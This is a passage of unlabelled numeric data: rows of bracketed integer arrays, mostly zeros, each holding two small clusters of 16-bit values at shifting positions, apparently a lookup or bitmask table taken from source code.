[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 44048, 3972, 22081, 25062, 48902, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 256, 26688, 43024, 12932, 2049, 57386],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 29712, 30340, 27969, 52966, 15366, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 34816, 25088, 59520, 38432, 9864, 17506, 35957],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 15376, 56708, 33857, 15334, 47366, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 56320, 38656, 64960, 49520, 46044, 29335, 30556],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 1040, 17540, 39745, 43238, 13830, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 35840, 49920, 51392, 5168, 58383],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 52240, 43908, 45633, 5606, 45830, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 29696, 64768, 18240, 26576, 116, 19965, 33150],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 37904, 4740, 51521, 33510, 12294, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 14336, 3584, 62336, 49376, 26424, 63758, 17753],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 23568, 31108, 57409, 61414, 44294, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 19456, 45824, 42176, 29488, 36428, 18355, 8976],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 9232, 57476, 63297, 23782, 10758, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 31744, 65280, 18368, 12272, 36476, 52947],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 60432, 18308, 3649, 51686, 42758, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 25600, 14592, 30272, 64400, 41828, 313, 31890],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 46096, 44676, 9537, 14054, 9222, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 59392, 64000, 36480, 20384, 24808, 29690, 19197],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 31760, 5508, 15425, 41958, 41222, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 48128, 3840, 7104, 22768, 54716, 28687, 51844],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 17424, 31876, 21313, 4326, 7686, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 2048, 33280, 4224, 51232, 11528, 53335],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 3088, 58244, 27201, 32230, 39686, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 21504, 46336, 62784, 9040, 35668, 15797, 34150],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 54288, 19076, 33089, 60134, 6150, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 38912, 9728, 47488, 608, 17304, 294, 24929],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 39952, 45444, 38977, 22502, 38150, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 11264, 43776, 25280, 12976, 31276, 10155, 33208],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 25616, 6276, 44865, 50406, 4614, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 54272, 5376, 56640, 16720, 56276, 35995],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 11280, 32644, 50753, 12774, 36614, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 17408, 28928, 50240, 40720, 10308, 24433, 4090],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 62480, 59012, 56641, 40678, 3078, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 18432, 37376, 29824, 39200, 16200, 11410, 3205],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 48144, 19844, 62529, 3046, 35078, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 39936, 34560, 31168, 49264, 27548, 60039, 7340],
